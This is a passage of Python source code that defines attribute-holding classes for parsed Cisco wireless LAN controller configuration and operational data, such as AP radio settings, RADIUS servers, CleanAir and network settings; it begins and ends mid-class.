self.slot_1_radio_role = None\n self.slot_1_cellid = None\n self.slot_1_station_configuration = None\n self.slot_1_configuration = None\n self.slot_1_number_of_wlans = None\n self.slot_1_medium_occupancy_limit = None\n self.slot_1_cfp_period = None\n self.slot_1_cfp_maxduration = None\n self.slot_1_bssid = None\n self.slot_1_operation_rate_set = None\n self.slot_1_operation_rate_set_6000_kilo_bits = None\n self.slot_1_operation_rate_set_9000_kilo_bits = None\n self.slot_1_operation_rate_set_12000_kilo_bits = None\n self.slot_1_operation_rate_set_18000_kilo_bits = None\n self.slot_1_operation_rate_set_24000_kilo_bits = None\n self.slot_1_operation_rate_set_36000_kilo_bits = None\n self.slot_1_operation_rate_set_48000_kilo_bits = None\n self.slot_1_operation_rate_set_54000_kilo_bits = None\n self.slot_1_mcs_set = None\n self.slot_1_mcs_set_mcs_0 = None\n self.slot_1_mcs_set_mcs_3 = None\n self.slot_1_mcs_set_mcs_4 
= None\n self.slot_1_mcs_set_mcs_5 = None\n self.slot_1_mcs_set_mcs_6 = None\n self.slot_1_mcs_set_mcs_7 = None\n self.slot_1_mcs_set_mcs_8 = None\n self.slot_1_mcs_set_mcs_9 = None\n self.slot_1_mcs_set_mcs_10 = None\n self.slot_1_mcs_set_mcs_11 = None\n self.slot_1_mcs_set_mcs_12 = None\n self.slot_1_mcs_set_mcs_13 = None\n self.slot_1_mcs_set_mcs_14 = None\n self.slot_1_mcs_set_mcs_15 = None\n self.slot_1_mcs_set_mcs_16 = None\n self.slot_1_mcs_set_mcs_17 = None\n self.slot_1_mcs_set_mcs_18 = None\n self.slot_1_mcs_set_mcs_19 = None\n self.slot_1_mcs_set_mcs_20 = None\n self.slot_1_mcs_set_mcs_21 = None\n self.slot_1_mcs_set_mcs_22 = None\n self.slot_1_mcs_set_mcs_23 = None\n self.slot_1_mcs_set_mcs_24 = None\n self.slot_1_mcs_set_mcs_25 = None\n self.slot_1_mcs_set_mcs_26 = None\n self.slot_1_mcs_set_mcs_27 = None\n self.slot_1_mcs_set_mcs_28 = None\n self.slot_1_mcs_set_mcs_29 = None\n self.slot_1_mcs_set_mcs_30 = None\n self.slot_1_mcs_set_mcs_31 = None\n self.slot_1_802_11ac_mcs_set = None\n self.slot_1_802_11ac_mcs_set_nss_1_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_2_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_3_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_4_mcs_0_9 = None\n self.slot_1_802_11ac_mcs_set_nss_4_mcs_0_7 = None\n self.slot_1_beacon_period = None\n self.slot_1_fragmentation_threshold = None\n self.slot_1_multi_domain_capability_implemented = None\n self.slot_1_multi_domain_capability_enabled = None\n self.slot_1_country_string = None\n self.slot_1_multi_domain_capability = None\n self.slot_1_multi_domain_capability_configuration = None\n self.slot_1_multi_domain_capability_first_chan_num = None\n self.slot_1_multi_domain_capability_number_of_channels = None\n self.slot_1_mac_operation_parameters = None\n self.slot_1_mac_operation_parameters_configuration = None\n self.slot_1_mac_operation_parameters_fragmentation_threshold = None\n self.slot_1_mac_operation_parameters_packet_retry_limit = None\n self.slot_1_tx_power = None\n self.slot_1_tx_power_num_of_supported_power_levels = None\n self.slot_1_tx_power_tx_power_level_1 = None\n self.slot_1_tx_power_tx_power_level_2 = None\n self.slot_1_tx_power_tx_power_level_3 = None\n self.slot_1_tx_power_tx_power_level_4 = None\n self.slot_1_tx_power_tx_power_level_5 = None\n self.slot_1_tx_power_tx_power_level_6 = None\n self.slot_1_tx_power_tx_power_level_7 = None\n self.slot_1_tx_power_tx_power_level_8 = None\n self.slot_1_tx_power_tx_power_configuration = None\n self.slot_1_tx_power_current_tx_power_level = None\n self.slot_1_tx_power_tx_power_assigned_by = None\n self.slot_1_phy_ofdm_parameters = None\n self.slot_1_phy_ofdm_parameters_configuration = None\n self.slot_1_phy_ofdm_parameters_current_channel = None\n self.slot_1_phy_ofdm_parameters_channel_assigned_by = None\n self.slot_1_phy_ofdm_parameters_extension_channel = None\n self.slot_1_phy_ofdm_parameters_channel_width = None\n self.slot_1_phy_ofdm_parameters_allowed_channel_list = None\n self.slot_1_phy_ofdm_parameters_allowed_channel_list_ = None\n self.slot_1_phy_ofdm_parameters_ti_threshold = None\n self.slot_1_phy_ofdm_parameters_dca_channel_list = None\n self.slot_1_phy_ofdm_parameters_legacy_tx_beamforming_configuration = None\n self.slot_1_phy_ofdm_parameters_legacy_tx_beamforming = None\n self.slot_1_phy_ofdm_parameters_antenna_type = None\n self.slot_1_phy_ofdm_parameters_internal_antenna_gain_in_5_dbi_units = None\n self.slot_1_phy_ofdm_parameters_diversity = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas = None\n 
self.slot_1_phy_ofdm_parameters_802_11n_antennas_a = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_b = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_c = None\n self.slot_1_phy_ofdm_parameters_802_11n_antennas_d = None\n self.slot_1_performance_profile_parameters = None\n self.slot_1_performance_profile_parameters_interference_threshold = None\n self.slot_1_performance_profile_parameters_noise_threshold = None\n self.slot_1_performance_profile_parameters_rf_utilization_threshold = None\n self.slot_1_performance_profile_parameters_data_rate_threshold = None\n self.slot_1_performance_profile_parameters_client_threshold = None\n self.slot_1_performance_profile_parameters_coverage_snr_threshold = None\n self.slot_1_performance_profile_parameters_coverage_exception_level = None\n self.slot_1_performance_profile_parameters_client_minimum_exception_level = None\n self.slot_1_rogue_containment_information = None\n self.slot_1_containment_count = None\n self.slot_1_cleanair_management_information = None\n self.slot_1_cleanair_management_information_cleanair_capable = None\n self.slot_1_cleanair_management_information_cleanair_management_administration_st = None\n self.slot_1_cleanair_management_information_cleanair_management_operation_state = None\n self.slot_1_cleanair_management_information_rapid_update_mode = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection_cleanair_nsi_key = None\n self.slot_1_cleanair_management_information_spectrum_expert_connection_spectrum_expert_connections_counter = None\n self.slot_1_cleanair_management_information_cleanair_sensor_state = None\n self.slot_1_radio_extended_configurations = None\n self.slot_1_radio_extended_configurations_beacon_period = None\n self.slot_1_radio_extended_configurations_beacon_range = None\n self.slot_1_radio_extended_configurations_multicast_buffer = None\n self.slot_1_radio_extended_configurations_multicast_data_rate = None\n self.slot_1_radio_extended_configurations_rx_sop_threshold = None\n self.slot_1_radio_extended_configurations_cca_threshold = None\n\n def update_name(self):\n self.name = self.cisco_ap_name\n\n def __str__(self):\n return 'AP config for ' + self.name\n\n def __repr__(self):\n return 'AP config for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Authentication_Server():\n def __init__(self, name=None):\n self.objname = 'RADIUS Authentication server'\n self.name = None\n self.type = None\n self.id = None\n self.ip_address = None\n self.port = None\n self.state = None\n self.timeout = None\n self.mgmt_timeout = None\n self.rfc3576 = None\n self.ipsec = None\n\n def update_name(self):\n self.name = self.id\n\n def get_one_item(self):\n return Radius_Authentication_Server()\n\n def __str__(self):\n return 'RADIUS AUTH server ' + self.name\n\n def __repr__(self):\n return 'RADIUS AUTH server ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Accounting_Server():\n def __init__(self, name=None):\n self.objname = 'RADIUS Accounting server'\n self.name = None\n self.type = None\n self.id = None\n self.ip_address = None\n self.port = None\n self.state = None\n self.timeout = None\n self.mgmt_timeout = None\n self.rfc3576 = None\n self.ipsec = None\n\n def update_name(self):\n self.name = self.id\n\n def get_one_item(self):\n return Radius_Accounting_Server()\n\n def 
__str__(self):\n return 'RADIUS ACCT server ' + self.name\n\n def __repr__(self):\n return 'RADIUS ACCT server ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Mobility_Group_Member():\n def __init__(self, name=None):\n self.objname = 'Mobility group member'\n self.name = None\n self.mac_address = None\n self.ip_address = None\n self.mobility_group_name = None\n self.multicast_ip = None\n self.state = None\n\n def update_name(self):\n self.name = self.ip_address\n\n def get_one_item(self):\n return Mobility_Group_Member()\n\n def __str__(self):\n return 'Mobility group member ' + self.name\n\n def __repr__(self):\n return 'Mobility group member ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Port():\n def __init__(self, name=None):\n self.objname = 'Port Information'\n self.name = None\n self.number = None\n self.type = None\n self.stp_state = None\n self.admin_mode = None\n self.phy_mode = None\n self.phy_status = None\n self.link_status = None\n self.link_trap = None\n self.poe = None\n self.sfp_type = None\n\n def update_name(self):\n self.name = self.number\n\n def get_one_item(self):\n return Port()\n\n def __str__(self):\n return 'Port info for ' + self.name\n\n def __repr__(self):\n return 'Port info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Rogue_Ap(): # Can be different between software versions, this is based on 8.3.150 output\n def __init__(self, name=None):\n self.objname = 'Rogue AP Information'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.mac_address = None\n self.classification = None\n self.state = None\n self.detecting_aps = None\n self.rogue_clients_number = None\n self.highest_rssi_ap = None\n self.highest_rssi_value = None\n self.channel = None\n self.second_rssi_ap = None\n self.second_rssi_value = None\n self.last_heard = None\n self.band = None\n\n def update_name(self):\n self.name = self.mac_address\n\n def __str__(self):\n return 'Rogue AP info for ' + self.name\n\n def __repr__(self):\n return 'Rogue AP info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass System_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'System Info'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.name_chassis = None\n self.burned_in_mac_address = None\n self.maximum_number_of_aps_supported = None\n self.system_information = None\n self.manufacturers_name = None\n self.product_name = None\n self.build_info = None\n self.product_version = None\n self.rtos_version = None\n self.bootloader_version = None\n self.emergency_image_version = None\n self.field_recovery_image_version = None\n self.firmware_version = None\n self.oui_file_update_time = None\n self.build_type = None\n self.oui_file_last_update_time = None\n self.build_type = None\n self.system_name = None\n self.system_location = None\n self.system_contact = None\n self.system_objectid = None\n self.redundancy_mode = None\n self.ip_address = None\n self.ipv6_address = None\n self.last_reset = None\n self.system_up_time = None\n self.system_timezone_location = None\n self.system_stats_realtime_interval = None\n self.system_stats_normal_interval = None\n self.configured_country = None\n 
self.operating_environment = None\n self.internal_temp_alarm_limits = None\n self.internal_temperature = None\n self.mgig_temp_alarm_limits = None\n self.mgig_temperature = None\n self.external_temp_alarm_limits = None\n self.external_temperature = None\n self.fan_status = None\n self.fan_speed_mode = None\n self.power_supply_1 = None\n self.power_supply_2 = None\n self.state_of_802_11b_network = None\n self.state_of_802_11a_network = None\n self.number_of_wlans = None\n self.number_of_active_clients = None\n self.oui_classification_failure_count = None\n self.memory_current_usage = None\n self.memory_average_usage = None\n self.cpu_current_usage = None\n self.cpu_average_usage = None\n self.flash_type = None\n self.flash_size = None\n self.maximum_number_of_aps_supported = None\n self.system_nas_id = None\n self.wlc_mic_certificate_types = None\n self.licensing_type = None\n self.licensing_type_usb = None\n self.backup_controller_configuration = None\n self.ap_primary_backup_controller = None\n self.ap_secondary_backup_controller = None\n self.raid_drive_0 = None\n self.raid_drive_1 = None\n\n def __str__(self):\n return 'WLC System Information'\n\n def __repr__(self):\n return 'WLC System Information'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Redundancy_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Redundancy Configuration'\n self.name = None\n self.type = 'mixed' # defines if class contain operational or config data\n self.redundancy_mode = None\n self.local_state = None\n self.peer_state = None\n self.unit = None\n self.unit_id = None\n self.redundancy_state = None\n self.mobility_mac = None\n self.redundancy_management_ip_address = None\n self.peer_redundancy_management_ip_address = None\n self.redundancy_port_ip_address = None\n self.peer_redundancy_port_ip_address = None\n self.peer_service_port_ip_address = None\n\n def __str__(self):\n return 'WLC redundancy config'\n\n def __repr__(self):\n return 'WLC redundancy config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Mobility_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Mobility Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.mobility_protocol_port = None\n self.default_mobility_domain = None\n self.multicast_mode = None\n self.mobility_domain_id_for_802_11r = None\n self.mobility_keepalive_interval = None\n self.mobility_keepalive_count = None\n self.mobility_group_members_configured = None\n self.mobility_control_message_dscp_value = None\n\n def __str__(self):\n return 'WLC mobility config'\n\n def __repr__(self):\n return 'WLC mobility config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Network_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Network Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.network_information = None\n self.rf_network_name = None\n self.dns_server_ip = None\n self.web_mode = None\n self.secure_web_mode = None\n self.secure_web_mode_cipher_option_high = None\n self.secure_web_mode_ssl_protocol = None\n self.web_csrf_check = None\n self.ocsp = None\n self.ocsp_responder_url = None\n 
self.secure_shell_ssh = None\n self.secure_shell_ssh_cipher_option_high = None\n self.telnet = None\n self.ethernet_multicast_forwarding = None\n self.ethernet_broadcast_forwarding = None\n self.ipv4_ap_multicast_broadcast_mode = None\n self.ipv6_ap_multicast_broadcast_mode = None\n self.igmp_snooping = None\n self.igmp_timeout = None\n self.igmp_query_interval = None\n self.mld_snooping = None\n self.mld_timeout = None\n self.mld_query_interval = None\n self.user_idle_timeout = None\n self.arp_idle_timeout = None\n self.cisco_ap_default_master = None\n self.ap_join_priority = None\n self.mgmt_via_wireless_interface = None\n self.mgmt_via_dynamic_interface = None\n self.bridge_mac_filter_config = None\n self.bridge_security_mode = None\n self.mesh_full_sector_dfs = None\n self.mesh_backhaul_rrm = None\n self.ap_fallback = None\n self.web_auth_cmcc_support = None\n self.web_auth_redirect_ports = None\n self.web_auth_proxy_redirect_ = None\n self.web_auth_captive_bypass__ = None\n self.web_auth_secure_web_ = None\n self.web_auth_secure_web_cipher_option_ = None\n self.web_auth_secure_web_sslv3_ = None\n self.web_auth_secure_redirection_ = None\n self.fast_ssid_change = None\n self.ap_discovery_nat_ip_only = None\n self.ip_mac_addr_binding_check = None\n self.link_local_bridging_status = None\n self.ccx_lite_status = None\n self.oeap_600_dual_rlan_ports = None\n self.oeap_local_network = None\n self.oeap_600_split_tunneling_printers = None\n self.webportal_online_client = None\n self.webportal_ntf_logout_client = None\n self.mdns_snooping = None\n self.mdns_query_interval = None\n self.web_color_theme = None\n self.capwap_prefer_mode = None\n self.network_profile = None\n self.client_ip_conflict_detection_dhcp = None\n self.mesh_bh_rrm = None\n self.mesh_aggressive_dca = None\n self.mesh_auto_rf = None\n self.http_profiling_port = None\n self.http_proxy_ip_address = None\n self.http_proxy_port = None\n self.wgb_client_forced_l2_roam = None\n\n def __str__(self):\n return 'WLC network config'\n\n def __repr__(self):\n return 'WLC network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Dhcp_Server():\n def __init__(self, name=None):\n self.objname = 'DHCP Server Configuration'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.ip_address = None\n self.dhcp_rx_discover_count = None\n self.dhcp_tx_discover_count = None\n self.dhcp_ack_count = None\n self.dhcp_request_count = None\n self.dhcp_inform_count = None\n self.dhcp_decline_count = None\n self.dhcp_release_count = None\n self.dhcp_reply_count = None\n self.dhcp_offer_count = None\n self.dhcp_nak_count = None\n self.tx_fails = None\n self.last_rx_time = None\n self.last_tx_time = None\n\n def __str__(self):\n return 'DHCP server ' + self.name\n\n def __repr__(self):\n return 'DHCP server ' + self.name\n\n def update_name(self):\n self.name = self.ip_address\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Cleanair_24G_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'CleanAir 2.4 GHz Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.clean_air_solution = None\n self.air_quality_settings = None\n self.air_quality_settings_air_quality_reporting = None\n self.air_quality_settings_air_quality_reporting_period_min = None\n 
self.air_quality_settings_air_quality_alarms = None\n self.air_quality_settings_air_quality_alarms_air_quality_alarm_threshold = None\n self.air_quality_settings_air_quality_alarms_unclassified_interference = None\n self.air_quality_settings_air_quality_alarms_unclassified_severity_threshold = None\n self.air_quality_settings_interference_device_reporting = None\n self.air_quality_settings_interference_device_types = None\n self.air_quality_settings_interference_device_types_bluetooth_link = None\n self.air_quality_settings_interference_device_types_microwave_oven = None\n self.air_quality_settings_interference_device_types_802_11_fh = None\n self.air_quality_settings_interference_device_types_bluetooth_discovery = None\n self.air_quality_settings_interference_device_types_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_jammer = None\n self.air_quality_settings_interference_device_types_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_dect_like_phone = None\n self.air_quality_settings_interference_device_types_video_camera = None\n self.air_quality_settings_interference_device_types_802_15_4 = None\n self.air_quality_settings_interference_device_types_wifi_inverted = None\n self.air_quality_settings_interference_device_types_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_superag = None\n self.air_quality_settings_interference_device_types_canopy = None\n self.air_quality_settings_interference_device_types_microsoft_device = None\n self.air_quality_settings_interference_device_types_wimax_mobile = None\n self.air_quality_settings_interference_device_types_wimax_fixed = None\n self.air_quality_settings_interference_device_types_ble_beacon = None\n self.air_quality_settings_interference_device_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms_bluetooth_link = None\n self.air_quality_settings_interference_device_types_triggering_alarms_microwave_oven = None\n self.air_quality_settings_interference_device_types_triggering_alarms_802_11_fh = None\n self.air_quality_settings_interference_device_types_triggering_alarms_bluetooth_discovery = None\n self.air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_jammer = None\n self.air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone = None\n self.air_quality_settings_interference_device_types_triggering_alarms_video_camera = None\n self.air_quality_settings_interference_device_types_triggering_alarms_802_15_4 = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_triggering_alarms_superag = None\n self.air_quality_settings_interference_device_types_triggering_alarms_canopy = None\n self.air_quality_settings_interference_device_types_triggering_alarms_microsoft_device = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed = None\n 
self.air_quality_settings_interference_device_types_triggering_alarms_ble_beacon = None\n self.additional_clean_air_settings = None\n self.additional_clean_air_settings_cleanair_ed_rrm_state = None\n self.additional_clean_air_settings_cleanair_ed_rrm_sensitivity = None\n self.additional_clean_air_settings_cleanair_ed_rrm_custom_threshold = None\n self.additional_clean_air_settings_cleanair_rogue_contribution = None\n self.additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold = None\n self.additional_clean_air_settings_cleanair_persistent_devices_state = None\n self.additional_clean_air_settings_cleanair_persistent_device_propagation = None\n\n def __str__(self):\n return 'CleanAir 2.4 GHz config'\n\n def __repr__(self):\n return 'CleanAir 2.4 GHz config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Cleanair_5G_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'CleanAir 5 GHz Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.clean_air_solution = None\n self.air_quality_settings = None\n self.air_quality_settings_air_quality_reporting = None\n self.air_quality_settings_air_quality_reporting_period_min = None\n self.air_quality_settings_air_quality_alarms = None\n self.air_quality_settings_air_quality_alarms_air_quality_alarm_threshold = None\n self.air_quality_settings_air_quality_alarms_unclassified_interference = None\n self.air_quality_settings_air_quality_alarms_unclassified_severity_threshold = None\n self.air_quality_settings_interference_device_reporting = None\n self.air_quality_settings_interference_device_types = None\n self.air_quality_settings_interference_device_types_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_jammer = None\n self.air_quality_settings_interference_device_types_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_dect_like_phone = None\n self.air_quality_settings_interference_device_types_video_camera = None\n self.air_quality_settings_interference_device_types_wifi_inverted = None\n self.air_quality_settings_interference_device_types_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_superag = None\n self.air_quality_settings_interference_device_types_canopy = None\n self.air_quality_settings_interference_device_types_wimax_mobile = None\n self.air_quality_settings_interference_device_types_wimax_fixed = None\n self.air_quality_settings_interference_device_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_jammer = None\n self.air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone = None\n self.air_quality_settings_interference_device_types_triggering_alarms_video_camera = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_triggering_alarms_superag = None\n self.air_quality_settings_interference_device_types_triggering_alarms_canopy = None\n 
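# Relative to Cleanair_24G_Config above, this 5 GHz variant omits the 2.4 GHz-only\n        # interferer types (Bluetooth, Microwave Oven, 802.11 FH, 802.15.4, Microsoft\n        # Device, BLE Beacon).\n        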
self.air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed = None\n self.additional_clean_air_settings = None\n self.additional_clean_air_settings_cleanair_ed_rrm_state = None\n self.additional_clean_air_settings_cleanair_ed_rrm_sensitivity = None\n self.additional_clean_air_settings_cleanair_ed_rrm_custom_threshold = None\n self.additional_clean_air_settings_cleanair_rogue_contribution = None\n self.additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold = None\n self.additional_clean_air_settings_cleanair_persistent_devices_state = None\n self.additional_clean_air_settings_cleanair_persistent_device_propagation = None\n\n def __str__(self):\n return 'CleanAir 5 GHz config'\n\n def __repr__(self):\n return 'CleanAir 5 GHz config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Switch_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Switch Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_3x_flow_control_mode = None\n self.fips_prerequisite_features = None\n self.wlancc_prerequisite_features = None\n self.ucapl_prerequisite_features = None\n self.last_login_information_display = None\n self.dtls_wlc_mic = None\n self.secret_obfuscation = None\n self.strong_password_check_features = None\n self.strong_password_check_features_case_check = None\n self.strong_password_check_features_consecutive_check = None\n self.strong_password_check_features_default_check = None\n self.strong_password_check_features_username_check = None\n self.strong_password_check_features_position_check = None\n self.strong_password_check_features_case_digit_check = None\n self.strong_password_check_features_min__password_length = None\n self.strong_password_check_features_min__upper_case_chars = None\n self.strong_password_check_features_min__lower_case_chars = None\n self.strong_password_check_features_min__digits_chars = None\n self.strong_password_check_features_min__special_chars = None\n self.mgmt_user = None\n self.mgmt_user_password_lifetime_days = None\n self.mgmt_user_password_lockout = None\n self.mgmt_user_lockout_attempts = None\n self.mgmt_user_lockout_timeout_mins = None\n self.snmpv3_user = None\n self.snmpv3_user_password_lifetime_days = None\n self.snmpv3_user_password_lockout = None\n self.snmpv3_user_lockout_attempts = None\n self.snmpv3_user_lockout_timeout_mins = None\n\n def __str__(self):\n return 'WLC switch config'\n\n def __repr__(self):\n return 'WLC switch config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Config():\n def __init__(self, name=None):\n self.objname = 'RADIUS Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.vendor_id_backward_compatibility = None\n self.call_station_id_case = None\n self.accounting_call_station_id_type = None\n self.auth_call_station_id_type = None\n self.extended_source_ports_support = None\n self.aggressive_failover = None\n self.keywrap = None\n self.fallback_test = None\n self.fallback_test_test_mode = None\n self.fallback_test_probe_user_name = None\n self.fallback_test_interval_in_seconds = None\n self.mac_delimiter_for_authentication_messages = None\n self.mac_delimiter_for_accounting_messages = None\n 
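# The fallback_test_* attributes above flatten the indented 'Fallback Test:' block\n        # of the controller output; the exact key-to-attribute mapping lives in\n        # radius_config_parsing_dict further down in this module.\n        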
self.radius_authentication_framed_mtu = None\n\n def __str__(self):\n return 'RADIUS config'\n\n def __repr__(self):\n return 'RADIUS config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ipv6_Config():\n def __init__(self, name=None):\n self.objname = 'IPv6 global configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.global_config = None\n self.reachable_lifetime_value = None\n self.stale_lifetime_value = None\n self.down_lifetime_value = None\n self.ra_throttling = None\n self.ra_throttling_allow_at_least = None\n self.ra_throttling_allow_at_most = None\n self.ra_throttling_max_through = None\n self.ra_throttling_throttle_period = None\n self.ra_throttling_interval_option = None\n self.ns_mulitcast_cachemiss_forwarding = None\n self.na_mulitcast_forwarding = None\n self.ipv6_capwap_udp_lite = None\n self.operating_system_ipv6_state = None\n\n def __str__(self):\n return 'IPv6 config'\n\n def __repr__(self):\n return 'IPv6 config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Advanced_Config():\n def __init__(self, name=None):\n self.objname = 'Advanced configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.probe_request_filtering = None\n self.probes_fwd_to_controller_per_client_per_radio = None\n self.probe_request_rate_limiting_interval = None\n self.aggregate_probe_request_interval = None\n self.increased_backoff_parameters_for_probe = None\n self.eap_identity_request_timeout_seconds = None\n self.eap_identity_request_max_retries = None\n self.eap_key_index_for_dynamic_wep = None\n self.eap_max_login_ignore_identity_response = None\n self.eap_request_timeout_seconds = None\n self.eap_request_max_retries = None\n self.eapol_key_timeout_milliseconds = None\n self.eapol_key_max_retries = None\n self.eap_broadcast_key_interval = None\n self.fastpath_packet_capture = None\n self.fastpath_fast_cache_control = None\n self.fastpath_fast_testmode = None\n self.dot11_padding = None\n self.padding_size = None\n self.advanced_hotspot_commands = None\n self.anqp_4_way_state = None\n self.garp_broadcast_state = None\n self.gas_request_rate_limit = None\n self.anqp_comeback_delay = None\n\n def __str__(self):\n return 'Really advanced WLC config'\n\n def __repr__(self):\n return 'Really advanced WLC config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group_Wlan(): # Special class to save info about WLAN configuration in AP group config\n def __init__(self, name=None):\n self.objname = 'Wlan_Ap_Group'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.wlan_id = None\n self.interface = None\n self.nac = None\n self.radio_policy = None\n self.open_dns_profile = None\n\n def update_name(self):\n self.name = self.wlan_id\n\n def __str__(self):\n return 'WLAN config in AP Group ' + self.name\n\n def __repr__(self):\n return 'WLAN config in AP Group ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group_Wlans(NamedList): # This class is important to add name attribute of AP that heard this list of APs\n def __init__(self, list_name, item_name):\n self.objname = 'Ap_Group_Wlans'\n self.item_name = 'Ap_Group_Wlan'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n 
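# Unlike Nearby_Aps further down, the list 'name' here is the owning AP group,\n        # copied from self.ap_group by update_name().\n        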
self.ap_group = None # Name of AP group that has these WLANs configured\n\n def get_one_item(self):\n return Ap_Group_Wlan()\n\n def update_name(self):\n if self.ap_group is not None:\n self.name = self.ap_group\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group(): # Item for NamedList \"AP Groups\" - subclass of wlc_config\n def __init__(self):\n self.objname = 'AP group config'\n self.name = None\n self.site_name = None\n self.site_description = None\n self.venue_group_code = None\n self.venue_type_code = None\n self.nas_identifier = None\n self.client_traffic_qinq_enable = None\n self.dhcpv4_qinq_enable = None\n self.ap_operating_class = None\n self.capwap_prefer_mode = None\n self.antenna_monitoring_status = None\n self.rf_profile_24 = None\n self.rf_profile_5 = None\n self.fabric_flex_acl_template_name = None\n self.ap_names = None\n self.wlans = Ap_Group_Wlans('Ap_Group_Wlans', 'Ap_Group_Wlan')\n\n def update_name(self):\n if self.site_name is not None:\n self.name = self.site_name\n\n def __str__(self):\n return 'AP group config for group ' + self.name\n\n def __repr__(self):\n return 'AP group config for group ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Nearby_Ap(): # Can be different between software versions, this is based on 8.3.150 output\n def __init__(self, name=None):\n self.objname = 'Nearby AP Information'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.mac_address = None\n self.rssi = None\n self.channel = None\n self.bandwidth = None\n # self.ap_name = None #Name of AP that heard this nearby AP\n # self.ap_slot = None #Slot ID of AP that heard this nearby AP\n\n def update_name(self):\n self.name = self.mac_address\n\n 